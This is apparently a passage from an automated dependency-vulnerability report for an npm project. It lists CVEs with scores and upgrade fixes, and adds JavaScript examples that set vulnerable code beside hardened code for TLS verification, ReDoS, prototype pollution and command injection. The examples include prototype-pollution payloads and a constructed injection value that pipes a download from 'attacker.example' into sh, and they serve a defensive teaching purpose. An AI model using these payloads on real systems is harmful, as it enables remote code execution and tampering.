    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-jf85-cpcp-j695

Release Date: 2019-07-26

Fix Resolution: lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge-4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0

WS-2020-0342 (High) detected in is-my-json-valid-2.20.0.tgz

WS-2020-0342 - High Severity Vulnerability

Vulnerable Library - is-my-json-valid-2.20.0.tgz

A [JSONSchema](https://json-schema.org/) validator that uses code generation to be extremely fast.

Library home page: https://registry.npmjs.org/is-my-json-valid/-/is-my-json-valid-2.20.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • request-2.74.0.tgz
          • har-validator-2.0.6.tgz
            • is-my-json-valid-2.20.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

A Regular Expression Denial of Service (ReDoS) vulnerability was found in is-my-json-valid before 2.20.2 via the style format.

Publish Date: 2020-06-27

URL: WS-2020-0342

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2020-06-27

Fix Resolution: is-my-json-valid - 2.20.2

CVE-2021-3749 (High) detected in axios-0.19.0.tgz, axios-0.15.3.tgz

CVE-2021-3749 - High Severity Vulnerability

Vulnerable Libraries - axios-0.19.0.tgz, axios-0.15.3.tgz

axios-0.19.0.tgz

Promise based HTTP client for the browser and node.js

Library home page: https://registry.npmjs.org/axios/-/axios-0.19.0.tgz

Dependency Hierarchy:

  • addon-actions-5.3.19.tgz (Root Library)
    • react-inspector-4.0.0.tgz
      • storybook-chromatic-2.2.2.tgz
        • localtunnel-1.10.1.tgz
          • axios-0.19.0.tgz (Vulnerable Library)

axios-0.15.3.tgz

Promise based HTTP client for the browser and node.js

Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz

Dependency Hierarchy:

  • github-api-3.0.0.tgz (Root Library)
    • axios-0.15.3.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

axios is vulnerable to Inefficient Regular Expression Complexity (ReDoS): the regular expression its trim() helper applies to request data backtracks quadratically on input containing a long run of whitespace, so an attacker who controls that input can tie up the event loop.

Publish Date: 2021-08-31

URL: CVE-2021-3749

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31/

Release Date: 2021-08-31

Fix Resolution (axios): 0.20.0

Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20

Fix Resolution (axios): 0.18.1

Direct dependency fix Resolution (github-api): 3.2.2

CVE-2021-31597 (High) detected in xmlhttprequest-ssl-1.5.5.tgz

CVE-2021-31597 - High Severity Vulnerability

Vulnerable Library - xmlhttprequest-ssl-1.5.5.tgz

XMLHttpRequest for Node

Library home page: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-1.5.5.tgz

Dependency Hierarchy:

  • karma-3.0.0.tgz (Root Library)
    • socket.io-2.1.1.tgz
      • socket.io-client-2.1.1.tgz
        • engine.io-client-3.2.1.tgz
          • xmlhttprequest-ssl-1.5.5.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.

Publish Date: 2021-04-23

URL: CVE-2021-31597

CVSS 3 Score Details (9.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31597

Release Date: 2021-04-23

Fix Resolution (xmlhttprequest-ssl): 1.6.1

Direct dependency fix Resolution (karma): 5.0.8
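
Added example, not code from xmlhttprequest-ssl or from this project: it shows how an options object whose rejectUnauthorized property is present but undefined defeats a default of true (Object.assign and object spread copy own properties even when their value is undefined, and a TLS layer that checks the flag for truthiness then skips verification), beside an options merge that does not have that failure mode. No connection is made; the hostname and the caller options are constructed for the demonstration.

```javascript
// Default Node behaviour: verify the peer certificate unless told otherwise.
const TLS_DEFAULTS = { rejectUnauthorized: true };

// Vulnerable: Object.assign copies own properties even when their value is
// undefined, so { rejectUnauthorized: undefined } overwrites the default.
function buildOptionsVulnerable(userOptions) {
  return Object.assign({}, TLS_DEFAULTS, userOptions);
}

// Hardened: copy only properties that are actually defined, then normalise the
// verification flag to a boolean so "falsy by accident" cannot happen.
function buildOptionsSafe(userOptions = {}) {
  const defined = Object.fromEntries(
    Object.entries(userOptions).filter(([, v]) => v !== undefined)
  );
  const merged = { ...TLS_DEFAULTS, ...defined };
  // Only an explicit false disables verification.
  merged.rejectUnauthorized = merged.rejectUnauthorized !== false;
  return merged;
}

// Mirrors the check a TLS layer performs: any falsy value means "do not verify".
function willVerifyCertificate(options) {
  return Boolean(options.rejectUnauthorized);
}

// Pre-flight guard for code that hands options to https.request: fail closed
// instead of silently sending credentials to an unverified peer.
function assertVerifies(options) {
  if (!willVerifyCertificate(options)) {
    throw new Error('TLS certificate verification is disabled; refusing to connect');
  }
  return options;
}

// Constructed: the shape a wrapper produces when the caller never set the flag
// but the property is still written onto the options object.
const callerOptions = { host: 'api.example.com', port: 443, rejectUnauthorized: undefined };
```

The check worth keeping in a code base is `assertVerifies`: a wrapper that merges user options into TLS defaults should never be trusted to have preserved the default, so verify the final object right before it is passed to `https.request`.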

CVE-2020-7733 (High) detected in ua-parser-js-0.7.21.tgz

CVE-2020-7733 - High Severity Vulnerability

Vulnerable Library - ua-parser-js-0.7.21.tgz

Lightweight JavaScript-based user-agent string parser

Library home page: https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.21.tgz

Dependency Hierarchy:

  • create-react-class-15.6.3.tgz (Root Library)
    • fbjs-0.8.17.tgz
      • ua-parser-js-0.7.21.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package ua-parser-js before 0.7.22 is vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA.

Publish Date: 2020-09-16

URL: CVE-2020-7733

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7733

Release Date: 2020-09-16

Fix Resolution (ua-parser-js): 0.7.22

Direct dependency fix Resolution (create-react-class): 15.7.0

CVE-2020-28469 (High) detected in multiple libraries

CVE-2020-28469 - High Severity Vulnerability

Vulnerable Libraries - glob-parent-3.1.0.tgz, glob-parent-5.1.0.tgz, glob-parent-5.1.1.tgz, glob-parent-2.0.0.tgz

glob-parent-3.1.0.tgz

Strips glob magic from a string to provide the parent directory path

Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-3.1.0.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • react-dev-utils-9.1.0.tgz
      • fork-ts-checker-webpack-plugin-1.5.0.tgz
        • chokidar-2.1.8.tgz
          • glob-parent-3.1.0.tgz (Vulnerable Library)

glob-parent-5.1.0.tgz

Extract the non-magic parent path from a glob string.

Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.0.tgz

Dependency Hierarchy:

  • stylelint-13.2.0.tgz (Root Library)
    • globby-11.0.0.tgz
      • fast-glob-3.2.2.tgz
        • glob-parent-5.1.0.tgz (Vulnerable Library)

glob-parent-5.1.1.tgz

Extract the non-magic parent path from a glob string.

Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.1.tgz

Dependency Hierarchy:

  • webpack-4.44.1.tgz (Root Library)
    • watchpack-1.7.4.tgz
      • chokidar-3.4.2.tgz
        • glob-parent-5.1.1.tgz (Vulnerable Library)

glob-parent-2.0.0.tgz

Strips glob magic from a string to provide the parent path

Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-2.0.0.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • core-5.3.19.tgz
      • glob-base-0.3.0.tgz
        • glob-parent-2.0.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in an enclosure containing a path separator is susceptible to Regular Expression Denial of Service (ReDoS): crafted input makes it backtrack excessively.

Publish Date: 2021-06-03

URL: CVE-2020-28469

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469

Release Date: 2021-06-03

Fix Resolution (glob-parent): 5.1.2

Direct dependency fix Resolution (@storybook/react): 6.5.0

Fix Resolution (glob-parent): 5.1.2

Direct dependency fix Resolution (stylelint): 13.2.1

Fix Resolution (glob-parent): 5.1.2

Direct dependency fix Resolution (webpack): 4.44.2

Fix Resolution (glob-parent): 5.1.2

Direct dependency fix Resolution (@storybook/react): 6.5.0
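
Added example serving the ReDoS entries on this page (ssri, is-my-json-valid, axios, ua-parser-js and glob-parent): it is not code from any of those packages or from this project. It uses the axios case as the concrete instance, because the pattern is the shortest to show: a trailing-whitespace regex that is not anchored at the start is retried from every index of the input, and each retry greedily consumes the remaining whitespace before failing on the final non-space character, so total work grows with the square of the input length. The linear replacement is the native trim() with the anchored fallback the axios fix adopted; the length guard and the timing harness are additions of this example.

```javascript
// Vulnerable: /\s*$/ is tried at every index; each attempt consumes the rest of
// the whitespace run and then fails on the trailing 'x', giving O(n^2) work.
function trimVulnerable(str) {
  return str.replace(/^\s*/, '').replace(/\s*$/, '');
}

// Hardened: native trim() is a single linear scan. The fallback anchors both
// alternatives, so the engine never re-enters the whitespace run from a
// different start position.
function trimSafe(str) {
  return typeof str.trim === 'function'
    ? str.trim()
    : str.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g, '');
}

// Adversarial input: a long run of whitespace followed by one non-space
// character, so the trailing-space regex fails everywhere without matching.
function adversarialInput(n) {
  return ' '.repeat(n) + 'x';
}

// Times one trim implementation on inputs of increasing size; returns ms per size.
function measure(fn, sizes) {
  return sizes.map((n) => {
    const input = adversarialInput(n);
    const start = Date.now();
    fn(input);
    return { n, ms: Date.now() - start };
  });
}

// Guard for values that arrive from the network: refuse pathological lengths
// before they reach any regex at all. Returns the trimmed string or throws.
function trimUntrusted(str, maxLen = 8192) {
  if (typeof str !== 'string') throw new TypeError('expected a string');
  if (str.length > maxLen) throw new RangeError(`input exceeds ${maxLen} chars`);
  return trimSafe(str);
}

// Each doubling of n roughly quadruples the vulnerable time and leaves the
// safe time flat; the exact numbers depend on the machine.
function demo() {
  const sizes = [2000, 4000, 8000];
  console.log('vulnerable:', measure(trimVulnerable, sizes));
  console.log('safe      :', measure(trimSafe, sizes));
}
demo();
```

The same shape, a quantified group that can match the same characters from many starting points, is what the is-my-json-valid, ua-parser-js and glob-parent advisories describe; when auditing a regex applied to untrusted input, look for unanchored patterns and nested or adjacent quantifiers over overlapping character classes, and cap input length before the regex runs.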

WS-2020-0345 (High) detected in jsonpointer-4.0.1.tgz

WS-2020-0345 - High Severity Vulnerability

Vulnerable Library - jsonpointer-4.0.1.tgz

Simple JSON Addressing.

Library home page: https://registry.npmjs.org/jsonpointer/-/jsonpointer-4.0.1.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • request-2.74.0.tgz
          • har-validator-2.0.6.tgz
            • is-my-json-valid-2.20.0.tgz
              • jsonpointer-4.0.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

A Prototype Pollution vulnerability was found in jsonpointer before 4.1.0 via the set function.

Publish Date: 2020-07-03

URL: WS-2020-0345

CVSS 3 Score Details (8.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2020-07-03

Fix Resolution: jsonpointer - 4.1.0
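
Added example serving both prototype-pollution entries on this page, the lodash defaultsDeep issue (CVE-2019-10744) and the jsonpointer set issue (WS-2020-0345); it is not lodash's, jsonpointer's or this project's code. mergeDefaultsVulnerable imitates the described defaultsDeep behaviour: it reads target[key] through the prototype chain, so a "constructor" key resolves to Object and the nested "prototype" key to Object.prototype, and a "__proto__" key (an own property on objects built by JSON.parse) reaches Object.prototype directly. setPointerVulnerable imitates a JSON Pointer set() that creates intermediate objects along the path. The hardened versions reject the three dangerous keys and only traverse own plain-object properties. The payloads are constructed.

```javascript
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
const isPlainObject = (v) =>
  v !== null && typeof v === 'object' &&
  (Object.getPrototypeOf(v) === Object.prototype || Object.getPrototypeOf(v) === null);

// Vulnerable "defaults" merge: target[key] is read through the prototype chain,
// so inherited values (Object, Object.prototype) become merge destinations.
function mergeDefaultsVulnerable(target, source) {
  for (const key in source) {
    const src = source[key];
    if (src !== null && typeof src === 'object') {
      let dst = target[key];
      if (dst === undefined) { dst = {}; target[key] = dst; }
      mergeDefaultsVulnerable(dst, src);
    } else if (target[key] === undefined) {
      target[key] = src; // defaults semantics: fill only missing keys
    }
  }
  return target;
}

// Hardened: skip dangerous keys, descend only into own plain objects.
function mergeDefaultsSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const src = source[key];
    if (isPlainObject(src)) {
      let dst = hasOwn(target, key) ? target[key] : undefined;
      if (dst === undefined) { dst = {}; target[key] = dst; }
      if (isPlainObject(dst)) mergeDefaultsSafe(dst, src);
    } else if (!hasOwn(target, key)) {
      target[key] = src;
    }
  }
  return target;
}

// RFC 6901 pointer "/a/b~1c" -> ['a', 'b/c'].
const pointerParts = (pointer) =>
  pointer.split('/').slice(1).map((p) => p.replace(/~1/g, '/').replace(/~0/g, '~'));

// Vulnerable pointer set: "/__proto__/polluted" walks onto Object.prototype.
function setPointerVulnerable(obj, pointer, value) {
  const parts = pointerParts(pointer);
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (cur[parts[i]] === undefined) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Hardened: reject forbidden segments outright, traverse own properties only.
function setPointerSafe(obj, pointer, value) {
  const parts = pointerParts(pointer);
  for (const p of parts) {
    if (FORBIDDEN_KEYS.has(p)) throw new Error(`forbidden pointer segment: ${p}`);
  }
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (!hasOwn(cur, parts[i]) || !isPlainObject(cur[parts[i]])) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Detection check: a fresh object must never see the marker property.
const isPolluted = (marker) => ({})[marker] !== undefined;

// Runs constructed payloads against both implementations, cleaning up after
// each vulnerable call, and reports whether Object.prototype was reached.
function demonstrate() {
  const ctorPayload = JSON.parse('{"constructor":{"prototype":{"polluted":true}}}');
  const protoPayload = JSON.parse('{"__proto__":{"polluted2":true}}');
  const result = {};
  mergeDefaultsVulnerable({}, ctorPayload);
  result.mergeVulnerable = isPolluted('polluted'); delete Object.prototype.polluted;
  mergeDefaultsVulnerable({}, protoPayload);
  result.mergeVulnerableProto = isPolluted('polluted2'); delete Object.prototype.polluted2;
  mergeDefaultsSafe({}, ctorPayload); mergeDefaultsSafe({}, protoPayload);
  result.mergeSafe = isPolluted('polluted') || isPolluted('polluted2');
  setPointerVulnerable({}, '/__proto__/polluted3', true);
  result.pointerVulnerable = isPolluted('polluted3'); delete Object.prototype.polluted3;
  try { setPointerSafe({}, '/__proto__/polluted3', true); } catch (e) { /* rejected as intended */ }
  result.pointerSafe = isPolluted('polluted3');
  return result;
}
```

A key-denylist is the minimum; the stronger fix in both hardened functions is refusing to use inherited values as destinations (hasOwn) and refusing to descend into anything that is not a plain object, which also blocks payloads that reach a prototype through some other inherited property.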

CVE-2019-16769 (Medium) detected in serialize-javascript-1.9.1.tgz

CVE-2019-16769 - Medium Severity Vulnerability

Vulnerable Library - serialize-javascript-1.9.1.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz

Dependency Hierarchy:

  • copy-webpack-plugin-4.5.2.tgz (Root Library)
    • serialize-javascript-1.9.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The serialize-javascript npm package before version 2.1.1 is vulnerable to Cross-site Scripting (XSS). It does not properly mitigate against unsafe characters in serialized regular expressions. This vulnerability is not affected on Node.js environment since Node.js's implementation of RegExp.prototype.toString() backslash-escapes all forward slashes in regular expressions. If serialized data of regular expression objects are used in an environment other than Node.js, it is affected by this vulnerability.

Publish Date: 2019-12-05

URL: CVE-2019-16769

CVSS 3 Score Details (5.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16769

Release Date: 2020-01-17

Fix Resolution (serialize-javascript): 2.1.1

Direct dependency fix Resolution (copy-webpack-plugin): 5.0.5

CVE-2020-15095 (Medium) detected in npm-2.15.12.tgz, npm-5.1.0.tgz

CVE-2020-15095 - Medium Severity Vulnerability

Vulnerable Libraries - npm-2.15.12.tgz, npm-5.1.0.tgz

npm-2.15.12.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz (Vulnerable Library)

npm-5.1.0.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like "<protocol>://[<user>[:<password>]@]<hostname>[:<port>][:][/]<path>". The password value is not redacted and is printed to stdout and also to any generated log files.

Publish Date: 2020-07-07

URL: CVE-2020-15095

CVSS 3 Score Details (4.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-93f3-23rq-pjfp

Release Date: 2020-07-07

Fix Resolution: npm - 6.14.6

CVE-2021-24033 (Medium) detected in react-dev-utils-9.1.0.tgz

CVE-2021-24033 - Medium Severity Vulnerability

Vulnerable Library - react-dev-utils-9.1.0.tgz

Webpack utilities used by Create React App

Library home page: https://registry.npmjs.org/react-dev-utils/-/react-dev-utils-9.1.0.tgz

Dependency Hierarchy:

  • react-5.3.19.tgz (Root Library)
    • react-dev-utils-9.1.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

react-dev-utils prior to v11.0.4 exposes a function, getProcessForPort, where an input argument is concatenated into a command string to be executed. This function is typically used from react-scripts (in Create React App projects), where the usage is safe. Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.

Publish Date: 2021-03-09

URL: CVE-2021-24033

CVSS 3 Score Details (5.6)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: https://www.facebook.com/security/advisories/cve-2021-24033

Release Date: 2021-03-09

Fix Resolution (react-dev-utils): 11.0.4

Direct dependency fix Resolution (@storybook/react): 6.1.20
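
Added example, not react-dev-utils' or this project's code: the shape of the command injection CVE-2021-24033 describes, a value concatenated into a shell command string, beside an argv-based version that cannot be injected into. Nothing is executed; the functions return what would be run so it can be inspected. The lsof invocation and its arguments are assumed for illustration, and the attacker value is constructed.

```javascript
// Vulnerable pattern: the value becomes part of a string handed to a shell,
// which honours ';', '|', '$(...)' and friends inside it.
function buildCommandVulnerable(port) {
  return `lsof -i:${port} -P -t -sTCP:LISTEN`;
}

// Hardened step 1: accept only a real TCP port (digits only, 1..65535).
function validatePort(input) {
  const s = String(input).trim();
  if (!/^\d{1,5}$/.test(s)) throw new Error(`invalid port: ${JSON.stringify(input)}`);
  const n = Number(s);
  if (n < 1 || n > 65535) throw new RangeError(`port out of range: ${n}`);
  return n;
}

// Hardened step 2: build an argv array for child_process.execFileSync(file, args),
// which never starts a shell, so metacharacters in a value stay literal.
function buildCommandSafe(input) {
  const port = validatePort(input);
  return { file: 'lsof', args: ['-i:' + String(port), '-P', '-t', '-sTCP:LISTEN'] };
}

// Audit helper: true when a value would change the meaning of a shell command.
function containsShellMetachars(value) {
  return /[;&|`$(){}<>\\"'\n\r\s]/.test(String(value));
}

// Constructed payload of the kind that turns the vulnerable string into two commands.
const attackerValue = '3000; curl http://attacker.example/x | sh';
```

Validation alone is not the fix: even a validated value should be passed as a separate argv element (execFile, not exec), so that a future change to the validator cannot reopen the injection.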
